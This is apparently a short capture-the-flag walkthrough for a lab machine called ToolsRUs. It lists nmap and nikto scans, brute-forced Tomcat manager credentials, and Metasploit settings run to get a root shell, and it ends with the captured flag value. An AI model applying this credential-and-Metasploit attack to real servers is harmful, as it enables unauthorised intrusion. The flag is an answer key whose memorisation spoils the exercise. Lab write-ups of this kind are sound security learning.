ToolsRUs

IP: 10.10.154.123

image

Penetration Testing Methodology

image

Reconnasance

• nmap

Enumerating

• gobuster

• hydra

Exploitation

• Apache Tomcat

Privilege Escalation

• Apache Tomcat/Coyote JSP engine 1.1

Capture-the-flag

• flag.txt

---

Walkthrough

nmap -A -v 10.10.154.123

image

nikto -h http://10.10.154.123:1234/manager/html -id "bob:bubbles"

image

nikto -h http://10.10.154.123/

image

Apache/2.4.18

Find vulnerability for Apache Tomcat/Coyote JSP engine 1.1

msfconsole -q
set HttpUsername bob
set HttpPassword bubbles
set RHOSTS 10.10.231.52
set RPORT 1234
options

image

run

image

getuid

image

cat /root/flag.txt

image

flag.txt: ff1fc4a81affcc7688cf89ae7dc6e0e1

By AdaniKamal